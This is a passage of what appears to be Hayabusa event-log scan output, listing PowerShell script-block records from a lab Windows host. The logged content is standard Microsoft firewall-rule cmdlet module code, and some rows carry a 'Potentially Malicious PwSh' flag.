+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
